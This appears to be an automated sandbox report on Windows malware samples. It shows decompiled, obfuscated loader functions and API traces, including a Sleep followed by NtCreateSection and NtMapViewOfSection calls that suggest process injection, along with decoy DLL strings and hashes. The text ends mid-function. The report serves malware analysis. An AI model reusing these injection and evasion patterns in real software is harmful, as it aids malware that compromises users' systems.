                                                          • Snapshot File: hcaresult_5_2_470000_cgjtubb.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction ID: 6b214e80103007eca947940ca629b0f77f36c1fcc8e570edb97f76d7bdc3c18d
                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction Fuzzy Hash: 28D01231145128B7D7002A94DC09BCE7B1CDF09B62F008411FB0DD9180C774994046E9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph image not preserved; nodes 401869-401907, with calls to 40119e, Sleep, 4013d8 and 4014a8)
                                                          C-Code - Quality: 62%
                                                          			E00401869(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				void* __edi;
                                                          				void* __ebp;
                                                          				intOrPtr _t8;
                                                          				void* _t11;
                                                          				intOrPtr _t13;
                                                          				intOrPtr* _t16;
                                                          				signed char _t19;
                                                          				void* _t20;
                                                          				intOrPtr* _t21;
                                                          				intOrPtr* _t22;
                                                          
                                                          				_t24 = __eflags;
                                                          				_push(0x18a0);
                                                          				_t8 =  *_t21;
                                                          				_t22 = _t21 + 4;
                                                          				L0040119E(_t8, 0x63, _t20, __eflags);
                                                          				_t16 = _a4;
                                                          				Sleep(0x1388);
                                                          				_t11 = E004013D8(_t19, _t24, _t16, _a8, _a12,  &_v8); // executed
                                                          				_t25 = _t11;
                                                          				if(_t11 != 0) {
                                                          					E004014A8(_t25, _t16, _t11, _v8, _a16); // executed
                                                          				}
                                                          				 *_t16(0xffffffff, 0);
                                                          				_push(0x18a0);
                                                          				_t13 =  *_t22;
                                                          				return L0040119E(_t13, 0x63, _t20, _t25);
                                                          			}















                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: 0e3b0a6706bab068868f47a51e5f7c8c9e7b56fc4d9aa96bcc056c135368eafa
                                                          • Instruction ID: 60862f2667b59bfd2b53fd736c2ec37b6a52218a42a16e6e58fdf04961db7cc8
                                                          • Opcode Fuzzy Hash: 0e3b0a6706bab068868f47a51e5f7c8c9e7b56fc4d9aa96bcc056c135368eafa
                                                          • Instruction Fuzzy Hash: 79015E37608204E7E7007A95DC8197A37699B45354F208137BA13791E1D63D9B12A76B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 384 40188b-4018bd call 40119e Sleep call 4013d8 391 4018cc-401907 call 40119e 384->391 392 4018bf-4018c7 call 4014a8 384->392 392->391
                                                          C-Code - Quality: 62%
                                                          			E0040188B(signed char __eax, void* __ebx, void* __edx, void* __edi, void* __eflags) {
                                                          				void* _t13;
                                                          				intOrPtr _t15;
                                                          				intOrPtr* _t19;
                                                          				signed char _t24;
                                                          				void* _t28;
                                                          				intOrPtr* _t30;
                                                          
                                                          				_t33 = __eflags;
                                                          				_t25 = __edi;
                                                          				asm("out 0xdc, al");
                                                          				_t24 = __eax;
                                                          				L0040119E(__edx, 0x63, __edi, __eflags);
                                                          				_t19 =  *((intOrPtr*)(_t28 + 8));
                                                          				Sleep(0x1388);
                                                          				_t13 = E004013D8(_t24, _t33, _t19,  *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)(_t28 + 0x10)), _t28 - 4); // executed
                                                          				_t34 = _t13;
                                                          				if(_t13 != 0) {
                                                          					E004014A8(_t34, _t19, _t13,  *((intOrPtr*)(_t28 - 4)),  *((intOrPtr*)(_t28 + 0x14))); // executed
                                                          				}
                                                          				 *_t19(0xffffffff, 0);
                                                          				_push(0x18a0);
                                                          				_t15 =  *_t30;
                                                          				return L0040119E(_t15, 0x63, _t25, _t34);
                                                          			}










                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: b2204d64e98a2de913c841e3b248d85559c76b61fbb623d473913d92bf580395
                                                          • Instruction ID: a729e010e1eaefc24d003010d97dd2b43a4c6b95cafc309fd02eabc3c929d3cf
                                                          • Opcode Fuzzy Hash: b2204d64e98a2de913c841e3b248d85559c76b61fbb623d473913d92bf580395
                                                          • Instruction Fuzzy Hash: 7AF04F37704205EBDB00BA95DC81A6E3769DF44315F20803BB612B91F1C63D8B12A76B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 403 40189a-4018bd call 40119e Sleep call 4013d8 409 4018cc-401907 call 40119e 403->409 410 4018bf-4018c7 call 4014a8 403->410 410->409
                                                          C-Code - Quality: 61%
                                                          			E0040189A(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                          				void* _t8;
                                                          				void* _t11;
                                                          				intOrPtr _t13;
                                                          				intOrPtr* _t17;
                                                          				signed char _t21;
                                                          				void* _t25;
                                                          				intOrPtr* _t27;
                                                          
                                                          				_t30 = __eflags;
                                                          				_t22 = __edi;
                                                          				_pop(ds);
                                                          				L0040119E(_t8, __ecx, __edi, __eflags);
                                                          				_t17 =  *((intOrPtr*)(_t25 + 8));
                                                          				Sleep(0x1388);
                                                          				_t11 = E004013D8(_t21, _t30, _t17,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                                                          				_t31 = _t11;
                                                          				if(_t11 != 0) {
                                                          					E004014A8(_t31, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                                                          				}
                                                          				 *_t17(0xffffffff, 0);
                                                          				_push(0x18a0);
                                                          				_t13 =  *_t27;
                                                          				return L0040119E(_t13, 0x63, _t22, _t31);
                                                          			}











                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: acd5664999f289340f50b25abb29b7ad2467a3a024473d975d06bf1365dd1af9
                                                          • Instruction ID: fa21e6fe5ec55b494b8a61ead8be6eb3dfa9bfc2d8f44280934193d3a60a32fd
                                                          • Opcode Fuzzy Hash: acd5664999f289340f50b25abb29b7ad2467a3a024473d975d06bf1365dd1af9
                                                          • Instruction Fuzzy Hash: B3F01D37604205EBDB00BA95DC819AE3769AF04315F20843BBA12B90E1C6398B12A72B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430487602.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00409000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_409000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction ID: 0919a159efc3dc78a400a241d7d35c155fcddafca829aeb5adc2301147472416
                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction Fuzzy Hash: A811803284014EBBCF165FD4CC51CEE3F22FB59354B58842AFE1869171C23AD9B5AB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:21
                                                          Total number of Limit Nodes:3
                                                          execution_graph 17268 506bc0 17269 506bc4 17268->17269 17270 506bc7 malloc 17268->17270 17249 469a47 17250 469a4c LoadLibraryA 17249->17250 17252 4b298d 17255 4b29b5 FindCloseChangeNotification 17252->17255 17256 4b2b44 GetLastError 17252->17256 17255->17256 17257 4b2e24 17256->17257 17258 469f68 17259 46a007 17258->17259 17260 46a018 LoadLibraryA 17258->17260 17259->17260 17271 50492e 17272 50496b ExitProcess 17271->17272 17273 50493d 17271->17273 17273->17272 17261 4b1464 17262 4b1477 17261->17262 17265 4afeef 17262->17265 17264 4b1540 17266 4aff0f 17265->17266 17267 4aff20 CharUpperBuffA 17266->17267 17267->17264

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 4b298d-4b29af 1 4b2b95-4b2bff 0->1 2 4b29b5-4b29dd 0->2 3 4b2dba-4b2ddf 1->3 4 4b2c05-4b2c1d 1->4 5 4b2a0a-4b2a16 2->5 6 4b29df-4b2a03 2->6 9 4b2df1-4b2e22 GetLastError 3->9 10 4b2de1-4b2de7 3->10 4->3 7 4b2a3b-4b2a72 5->7 8 4b2a18-4b2a34 5->8 6->5 13 4b2ac6-4b2acc 7->13 14 4b2a74-4b2a76 7->14 8->7 11 4b2e53-4b2e87 9->11 12 4b2e24-4b2e4c 9->12 15 4b2de9 10->15 16 4b2dee 10->16 17 4b2e89-4b2e8f 11->17 18 4b2e91-4b2ecd call 4b009d 11->18 12->11 21 4b2ace-4b2b07 13->21 22 4b2b0d-4b2b42 FindCloseChangeNotification 13->22 19 4b2a78-4b2aa1 14->19 20 4b2ab1-4b2ac0 14->20 15->16 16->9 17->18 32 4b2ed2 18->32 24 4b2ac3 19->24 25 4b2aa3-4b2aaf 19->25 20->24 21->22 26 4b2b68 22->26 27 4b2b44-4b2b62 22->27 24->13 25->20 29 4b2b6b-4b2b83 26->29 27->29 30 4b2b64-4b2b66 27->30 31 4b2b89-4b2b90 29->31 30->26 30->31 31->3 32->32
                                                          C-Code - Quality: 53%
                                                          			E004B298D(intOrPtr __ebx, void* __ecx, signed int __edx, signed int __esi) {
                                                          				int _t71;
                                                          				int _t82;
                                                          				long _t84;
                                                          				char* _t85;
                                                          				int _t87;
                                                          				int _t89;
                                                          				int _t99;
                                                          				int _t102;
                                                          				char* _t104;
                                                          				int _t105;
                                                          				char* _t107;
                                                          				char* _t118;
                                                          				signed int _t127;
                                                          				void* _t129;
                                                          				void* _t132;
                                                          				void* _t147;
                                                          				short _t153;
                                                          				intOrPtr _t164;
                                                          				void* _t165;
                                                          				intOrPtr _t167;
                                                          				void* _t188;
                                                          				void* _t191;
                                                          
                                                          				_t187 = __esi;
                                                          				_t170 = __edx;
                                                          				 *(_t191 - 0x10) =  *(_t191 - 0x10) - __ebx;
                                                          				 *((intOrPtr*)(_t191 - 0x14)) = __ebx;
                                                          				_t153 = __ecx - 0x602e;
                                                          				 *((intOrPtr*)(_t191 - 0xc)) = __ebx;
                                                          				_t71 =  *(_t191 - 8);
                                                          				if( *((intOrPtr*)(_t191 - 0x40)) == 0xffffffff) {
                                                          					 *(_t191 - 8) = _t71;
                                                          					 *0x50813e = _t153;
                                                          					 *(_t191 - 0x10) = "WindowsCodecs.dll";
                                                          					_t118 = 0x3cb383;
                                                          					_t82 =  *(_t191 - 8);
                                                          					if( *(_t191 - 0x44) != 0x20) {
                                                          						L21:
                                                          						 *0x5081d6 =  *0x5081d6 - 0x85cb;
                                                          						 *(_t191 - 8) = _t82;
                                                          						if(_t82 < 0x2057) {
                                                          							if(_t118 != 0x39) {
                                                          								_t118 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
                                                          							}
                                                          						}
                                                          						_t156 = 0x674c;
                                                          						 *0x5081a6 = 0x674c;
                                                          						_t177 = 0x871324;
                                                          						_t84 = GetLastError();
                                                          						 *0x5081f4 = 0x871324;
                                                          						 *(_t191 - 8) = _t84;
                                                          						_t85 = "wmi.dll";
                                                          						if(_t118 == 0x25f343) {
                                                          							_t118 = "LookupPrivilegeValueA";
                                                          							_t156 = 0xe16f;
                                                          							_t177 =  *0x5081fa; // 0x8a34
                                                          						}
                                                          						 *0x50afe1 = _t85;
                                                          						_t188 = _t187 + 0xc800;
                                                          						 *0x50afe5 = 0;
                                                          						_t87 =  *(_t191 - 8);
                                                          						 *(_t191 - 8) = _t87;
                                                          						 *(_t191 - 8) = _t87;
                                                          						_t89 =  *(_t191 - 8);
                                                          						 *(_t191 - 0x44) = _t89;
                                                          						if((_t177 - 0x0000009d & 0x000000a5) == 0) {
                                                          							 *0x509dc3 =  *0x509dc3 - _t188;
                                                          						}
                                                          						 *(_t191 - 8) = _t89;
                                                          						E004B009D(_t89, 0, _t156, _t89, _t89, _t89);
                                                          						 *(_t191 - 0x10) =  &(( *(_t191 - 0x10))[0x36e765]);
                                                          						 *((intOrPtr*)(_t191 - 0xc)) =  *((intOrPtr*)(_t191 - 0xc)) + 0x22a07e;
                                                          						 *(_t191 - 0x10) = 0x36e765;
                                                          						 *0x508136 =  *0x508136 + _t156;
                                                          						_push(0x4b2ed4);
                                                          						goto __ecx;
                                                          					}
                                                          					 *0x50afe1 = _t82;
                                                          					 *(_t191 - 8) = _t82;
                                                          					_push(_t82);
                                                          					_push(_t82);
                                                          					_push(_t82);
                                                          					_push(E004B2C1E);
                                                          					_push(L004ADFCC);
                                                          					return _t82;
                                                          				}
                                                          				_t127 =  *0x50afe6; // -97
                                                          				 *0x50853b = _t71;
                                                          				 *(_t191 - 8) = _t71;
                                                          				_t129 =  !_t127 +  !_t127;
                                                          				if(_t129 > 0x350e) {
                                                          					 *((intOrPtr*)(_t191 - 0x14)) =  *((intOrPtr*)(_t191 - 0x14)) - _t129;
                                                          					 *0x508116 = _t153;
                                                          					_t153 = 0x6c3e;
                                                          					 *0x5081b8 = __edx;
                                                          					_t170 = __edx + 0x9e;
                                                          					 *0x508238 = __esi;
                                                          				}
                                                          				_t187 = 0;
                                                          				_t99 =  *(_t191 - 8);
                                                          				if(_t99 >= 0x168f) {
                                                          					 *(_t191 - 0x10) =  &(( *(_t191 - 0x10))[(char*)("xmllite.dll")]);
                                                          					_t153 =  *0x5081a0; // 0xea90
                                                          				}
                                                          				 *(_t191 - 8) = _t99;
                                                          				_t132 =  *(_t191 - 0x10) - 0x48;
                                                          				_t102 =  *(_t191 - 8);
                                                          				_t164 =  *0x50816e; // 0xfe20
                                                          				_t165 = _t164 + 1;
                                                          				_push( *((intOrPtr*)(_t191 - 0x40)));
                                                          				 *0x50afd8 =  *0x50afd8 + _t102;
                                                          				 *(_t191 - 8) = _t102;
                                                          				_t104 =  *(_t191 - 8);
                                                          				if(_t132 > 0x3a) {
                                                          					L11:
                                                          					if(_t104 != 0x17fba1) {
                                                          						_t165 = _t165 - 0x5eb238;
                                                          						 *0x508176 =  *0x508176 - _t165;
                                                          						 *0x508194 =  *0x508194 + _t165;
                                                          						_t170 = (_t170 & 0x007afb40) + 0x820d83;
                                                          						 *0x50afe1 = _t104;
                                                          					}
                                                          					 *0x50835d =  *0x50835d - _t187; // executed
                                                          					_t105 = FindCloseChangeNotification(??); // executed
                                                          					 *0x5081e4 = _t170;
                                                          					 *(_t191 - 8) = _t105;
                                                          					_t118 = 0x45;
                                                          					_t107 =  *(_t191 - 8);
                                                          					 *((intOrPtr*)(_t191 - 0x14)) = 0;
                                                          					if(_t165 >= _t165) {
                                                          						L16:
                                                          						goto L17;
                                                          					} else {
                                                          						 *0x5081b4 = _t170;
                                                          						 *0x50afe1 = _t107;
                                                          						if(_t107 == 0) {
                                                          							L17:
                                                          							 *0x50856f = _t107;
                                                          							_t118 = 0x28efc3;
                                                          							 *0x50afda =  *0x50afda - 0x28efc3;
                                                          							L18:
                                                          							_t82 = 1;
                                                          							goto L21;
                                                          						}
                                                          						if(_t187 <= 0) {
                                                          							goto L18;
                                                          						}
                                                          						goto L16;
                                                          					}
                                                          				} else {
                                                          					if(_t132 <= _t132) {
                                                          						L9:
                                                          						_t147 = 0xe3;
                                                          						 *0x5086df =  *0x5086df;
                                                          						L10:
                                                          						_t132 = _t147 - 3;
                                                          						goto L11;
                                                          					}
                                                          					_t147 = 0x488b92;
                                                          					 *((intOrPtr*)(_t191 - 0x14)) =  *((intOrPtr*)(_t191 - 0x14)) - _t165;
                                                          					_t167 = E00508174; // 0x28a9
                                                          					_t165 = _t167 - 0x784f;
                                                          					 *0x5081c4 =  *0x5081c4 - 0x8031;
                                                          					_t170 = 0x10062;
                                                          					if(0x8031 > 0) {
                                                          						goto L10;
                                                          					}
                                                          					_t187 = _t187 | 0x0000af80;
                                                          					 *0x50afe1 =  &(( *0x50afe1)[_t104]);
                                                          					goto L9;
                                                          				}
                                                          			}


                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004B2B1E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID: $9$B5d$EtwEventWriteStartScenario$LookupPrivilegeValueA$PenIMC_v0400.dll$WindowsCodecs.dll$api-ms-win-core-rtlsupport-l1-1-0.dll$ddrawex.dll$e6$wmi.dll$xmllite.dll$V;
                                                          • API String ID: 2591292051-4056405076
                                                          • Opcode ID: ce372821e85e69430d5d910ed6b406007421b2e5bad2cf04427e3ac0a192bbef
                                                          • Instruction ID: 7c6f6c4814ddfa45a8eb8d528c7ad84f763cab7e9ecc0dadf1858dd0c6515584
                                                          • Opcode Fuzzy Hash: ce372821e85e69430d5d910ed6b406007421b2e5bad2cf04427e3ac0a192bbef
                                                          • Instruction Fuzzy Hash: BCA1ADB5E443069FCB00DFB9D894AEEBBB0FB38310F44416AD844E7752D6780A4AD755
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 33 469f68-46a005 34 46a007-46a015 33->34 35 46a018-46a0a1 LoadLibraryA 33->35 34->35
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0046A026
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: 7-"$EnumWindowStationsA$RtlEthernetStringToAddressW$SystemPropertiesComputerName.exe$WcnEapAuthProxy.dll$nshhttp.dll$wlanmsm.dll$wmi.dll
                                                          • API String ID: 1029625771-4078750143
                                                          • Opcode ID: 92e9af6b17e92157de21319807b1534378470bf3899f357b9b9a6b35d96fee7d
                                                          • Instruction ID: c008f100a7b466feeee12ba50e682fed69aab6b0f8a747ef4b9ccaaf5347e6ed
                                                          • Opcode Fuzzy Hash: 92e9af6b17e92157de21319807b1534378470bf3899f357b9b9a6b35d96fee7d
                                                          • Instruction Fuzzy Hash: 2E314D74B5070AABCB00DFA8E8D5ADD7BF0FB28320F1040B9A544EB752E6755A49DB06
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 294 469a47-469a4a 295 469a52-469a86 294->295 296 469a4c 294->296 297 469aa4-469af1 LoadLibraryA 295->297 298 469a88-469a9d 295->298 296->295 298->297
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 00469ABA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: 4
                                                          • API String ID: 1029625771-4088798008
                                                          • Opcode ID: 42e16af78128252f58ca7e93dbd5f69779be7f5cdd364aa5d4ce96d28c2f122e
                                                          • Instruction ID: eebe5dbae67eddba5e3c7071b305676587c3d350f0af83ae0408f3cf53fbd3f4
                                                          • Opcode Fuzzy Hash: 42e16af78128252f58ca7e93dbd5f69779be7f5cdd364aa5d4ce96d28c2f122e
                                                          • Instruction Fuzzy Hash: BD014578E44345AFEB00DFB4DC997EC7FB0EF28300F20806A9946A7391E6780A05DB09
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 299 50492e-50493b 300 50496b-504981 ExitProcess 299->300 301 50493d-504954 299->301 302 504956 301->302 303 504958-50495b 301->303 302->303 304 504965 303->304 305 50495d-504960 303->305 304->300 305->304
                                                          C-Code - Quality: 100%
                                                          			E0050492E() {
                                                          				char _t4;
                                                          				signed int _t5;
                                                          				signed int _t8;
                                                          				signed short _t12;
                                                          				signed int _t15;
                                                          
                                                          				 *0x50afdf =  *0x50afdf + _t12;
                                                          				if((_t12 & 0x0000907b) <= 0) {
                                                          					_t8 =  *0x50afe1; // -128
                                                          					 *0x50afe3 = _t4;
                                                          					if(_t15 >= 0) {
                                                          						_t15 =  !_t15;
                                                          					}
                                                          					if(_t15 >= 0) {
                                                          						_t8 = "wmi.dll";
                                                          					}
                                                          					_t5 = _t8 & 0x002da9ad;
                                                          				}
                                                          				 *0x5080f4 =  *0x5080f4 - _t5 + 0x3acd;
                                                          				 *0x508537 =  *0x508537 - _t4; // executed
                                                          				ExitProcess(0);
                                                          			}


                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID: wmi.dll
                                                          • API String ID: 621844428-378833482
                                                          • Opcode ID: 022ca020a66c06748da2aeed5f516e7d73faff2430de42b941ddf2cded9b3ddc
                                                          • Instruction ID: 122a8f836d5055b0b18aae3166350b7fa95a1c627136e6a0cea81362c986e5d6
                                                          • Opcode Fuzzy Hash: 022ca020a66c06748da2aeed5f516e7d73faff2430de42b941ddf2cded9b3ddc
                                                          • Instruction Fuzzy Hash: E5E068F90147834AC7019B387C5DC9F3F61E7B9790309163A89D18315AE51304086746
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E004AFEEF(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
                                                          				long _v8;
                                                          				intOrPtr _v12;
                                                          				CHAR* _v16;
                                                          				void* __ebp;
                                                          				long _t14;
                                                          				CHAR* _t15;
                                                          				void* _t20;
                                                          
                                                          				_v16 = 0;
                                                          				_t14 = _a8 + _a8;
                                                          				_v8 = _t14;
                                                          				_v12 = _t14;
                                                          				_push(_v12);
                                                          				_t15 = E004A80E0(_t14, __ebx, _t20); // executed
                                                          				_v16 = _t15;
                                                          				L004AFE7F(_v16, _a4, _a8);
                                                          				CharUpperBuffA(_v16, _v8); // executed
                                                          				return _v16;
                                                          			}


                                                          APIs
                                                          • CharUpperBuffA.USER32(00000000,?,?), ref: 004AFF26
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID:
                                                          • API String ID: 3964851224-0
                                                          • Opcode ID: ab227a7f053a98a651e34f48330d718ae13e0a23de29143f5016cdb95e4e37d9
                                                          • Instruction ID: 09f68744fee8e61ca9e5a70f2bade2b4d37b6c5a1ab70de6c818ee14dc65e68a
                                                          • Opcode Fuzzy Hash: ab227a7f053a98a651e34f48330d718ae13e0a23de29143f5016cdb95e4e37d9
                                                          • Instruction Fuzzy Hash: 4EF0AE71C00108BFCF019FA9DC41A8EBBB1EF14318F10C1A9A824A6261D7368A24EF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00506BC0(int __edx) {
                                                          				void* _t1;
                                                          
                                                          				if(__edx != 0) {
                                                          					_t1 = malloc(__edx); // executed
                                                          					return _t1;
                                                          				} else {
                                                          					return 0;
                                                          				}
                                                          			}


                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: malloc
                                                          • String ID:
                                                          • API String ID: 2803490479-0
                                                          • Opcode ID: 98684c3b5df8c63e5d034182714e5b84b52da44d776c3cf739622103f4d23545
                                                          • Instruction ID: 120f65901945ea55295756b376a65ff461912b5ae038a2b02e5a620be8355149
                                                          • Opcode Fuzzy Hash: 98684c3b5df8c63e5d034182714e5b84b52da44d776c3cf739622103f4d23545
                                                          • Instruction Fuzzy Hash: E8A011CCE2008000EA082032280202B202232E0B0BBE8C8B8A800A00A8FE38C22C200A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CryptCreateHash.ADVAPI32(?,00008003,?,00000000,?,00000001), ref: 004B37DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CreateCryptHash
                                                          • String ID: =y'$AddInUtil.exe$CNHMWL.dll$EtwEventWriteStartScenario$LookupPrivilegeValueA$MC<$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$SystemPropertiesComputerName.exe$WSearchMigPlugin.dll$api-ms-win-core-sysinfo-l1-1-0.dll$credssp.dll$nshhttp.dll$wmi.dll$xmllite.dll$|N/
                                                          • API String ID: 4184778727-312422330
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E004F210A(void* __ebx) {
                                                          				void* _t77;
                                                          				signed int _t78;
                                                          				signed int _t85;
                                                          				signed int _t86;
                                                          				signed int _t88;
                                                          				intOrPtr _t89;
                                                          				signed char _t90;
                                                          				signed int _t91;
                                                          				signed int _t92;
                                                          				void* _t93;
                                                          				signed int _t98;
                                                          				void* _t103;
                                                          				intOrPtr _t104;
                                                          				signed int _t105;
                                                          				signed int _t107;
                                                          				signed int _t108;
                                                          				signed int _t110;
                                                          				void* _t171;
                                                          				signed int _t212;
                                                          				void* _t221;
                                                          				intOrPtr _t232;
                                                          				intOrPtr _t234;
                                                          				void* _t235;
                                                          				intOrPtr _t273;
                                                          				short _t313;
                                                          				signed char _t314;
                                                          				signed short _t317;
                                                          				void* _t318;
                                                          				signed short _t322;
                                                          				signed char _t323;
                                                          				signed short _t324;
                                                          				signed short _t329;
                                                          				signed char _t331;
                                                          				signed short _t332;
                                                          				signed short _t333;
                                                          				intOrPtr _t342;
                                                          				void* _t343;
                                                          				signed char _t345;
